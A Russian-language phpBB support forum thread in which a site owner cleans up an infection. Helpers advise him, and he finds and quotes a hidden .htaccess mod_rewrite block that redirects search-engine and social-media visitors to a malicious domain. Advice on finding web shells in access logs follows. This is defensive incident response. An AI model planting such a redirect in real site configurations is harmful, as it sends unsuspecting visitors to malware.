Как убить Трояна?
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
).
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение

-
- phpBB 1.2.1
- Сообщения: 22
- Стаж: 18 лет 7 месяцев
- Благодарил (а): 1 раз
Как убить Трояна?
обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
-
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз
Re: Как убить Трояна?
zeroed, вот твой вирус:
Код: Выделить всё
GET http://ubuntologia.ru/forum/styles/prosilver/template/forum_fn.js HTTP/1.1
Host: ubuntologia.ru
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Accept: */*
Referer: http://ubuntologia.ru/forum/search.php?search_id=active_topics
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: phpbb3_ubun_k=; phpbb3_ubun_sid=bd96ddcb426aac983d5f97f6a2144e48; phpbb3_ubun_u=1
Connection: keep-alive
Connection: keep-alive
Код: Выделить всё
HTTP/1.1 301 Moved Permanently
Date: Fri, 08 Jun 2012 15:22:07 GMT
Server: Apache/2.2.14 (Ubuntu)
Location: http://gagapgeg.ru/haiaig?8
Vary: Accept-Encoding
Content-Length: 315
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://****.ru/haiaig?8">here</a>.</p>
<hr>
<address>Apache/2.2.14 (Ubuntu) Server at ubuntologia.ru Port 80</address>
</body></html>
-
- phpBB 1.4.2
- Сообщения: 70
- Стаж: 16 лет 2 месяца
- Откуда: Москва
- Благодарил (а): 1 раз
- Поблагодарили: 1 раз
Re: Как убить Трояна?
Сравнил с помощью WinMerge forum_fn.js и не нашел никакой разницы с исходным файлом из свежескачанного архива с установкой форума.
-
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз
-
- phpBB 1.4.2
- Сообщения: 70
- Стаж: 16 лет 2 месяца
- Откуда: Москва
- Благодарил (а): 1 раз
- Поблагодарили: 1 раз
Re: Как убить Трояна?
MIT,
Спасибо.
Выпилил.
Интересно, стоит где-то еще или нет что-нибудь еще..
Добавлено спустя 1 минуту 54 секунды:
Что было:
В файле .htaccess было вставлено следующее:
причем вставили так, что не было видно, добавили кучу пробелов. нашел в двух местах.
Спасибо.
Выпилил.
Интересно, стоит где-то еще или нет что-нибудь еще..
Добавлено спустя 1 минуту 54 секунды:
Что было:
В файле .htaccess было вставлено следующее:
Код: Выделить всё
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://gagapgeg.ru/haiaig?8 [R=301,L]
</IfModule>
-
- phpBB 3.0.7-PL1
- Сообщения: 2535
- Стаж: 15 лет 7 месяцев
- Поблагодарили: 71 раз
Как убить Трояна?
Зашел. Нажал на любую тему. Никаких вирусов не обнаружил.
Любовь и боль, покой и бой я как любой несу с собой…
-
- phpBB 1.4.2
- Сообщения: 70
- Стаж: 16 лет 2 месяца
- Откуда: Москва
- Благодарил (а): 1 раз
- Поблагодарили: 1 раз
Re: Как убить Трояна?
Ну так я его выпилил. Отлично значит :) Всем спасибо. Буду сейчас просматривать бэкапы и смотреть, когда он появился. Может по логам пойму, что произошло.МайскийЖук писал(а):Зашел. Нажал на любую тему. Никаких вирусов не обнаружил.
Добавлено спустя 38 минут 7 секунд:
Только что вернулись все файлы назад..
FTP я отключил, пароли сменил..
Откуда еще могут заходить? Где можно посмотреть логи, кто добавил этот файл?
-
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз
Re: Как убить Трояна?
Веб-шелл, ищи подозрительные файлы php.zeroed писал(а):Откуда еще могут заходить?
access_log, ищи частые запросы к неизвестным файлам методом POST.zeroed писал(а):Где можно посмотреть логи, кто добавил этот файл?
-
- phpBB 1.4.2
- Сообщения: 70
- Стаж: 16 лет 2 месяца
- Откуда: Москва
- Благодарил (а): 1 раз
- Поблагодарили: 1 раз
Re: Как убить Трояна?
Пока я их ищу и удаляю, он создает новые..
Можно как-то скопом все это предотвратить кроме отключения сервака?
Можно как-то скопом все это предотвратить кроме отключения сервака?
-
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз
Re: Как убить Трояна?
zeroed, можешь на время анализа логов отключить веб-сервер, изучить и удалить подозрительные файлы (скачав их себе на всякий случай), а также проверить странные запросы к файлам движка (длинные GET-запросы, POST-запросы к файлам, которые не должны оные обрабатывать, запросы с того же IP, с которого были запросы к подозрительным файлам и т.п.).
-
- phpBB 1.4.2
- Сообщения: 70
- Стаж: 16 лет 2 месяца
- Откуда: Москва
- Благодарил (а): 1 раз
- Поблагодарили: 1 раз
Re: Как убить Трояна?
спасибо, ip нашел и забанил его в системе, сижу ищу файлы
POST к udp это нормально?
POST к udp это нормально?
-
- Former team member
- Сообщения: 2500
- Стаж: 16 лет 1 месяц
- Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
- Поблагодарили: 26 раз
-
- phpBB 3.0.0 RC2
- Сообщения: 1540
- Стаж: 13 лет 3 месяца
- Благодарил (а): 49 раз
- Поблагодарили: 77 раз
Re: Как убить Трояна?
Со вчерашнего дня аваст блокирует мой сайт. Другие антивири молчат, я не вижу признаков заражения. Не находят ничего онлай сканнеры. Я написал в поддержку аваста по поводу ложного заражения. Но все таки. Может быть я чего то не вижу. Уважаемые гуру, заражен ли мой форум?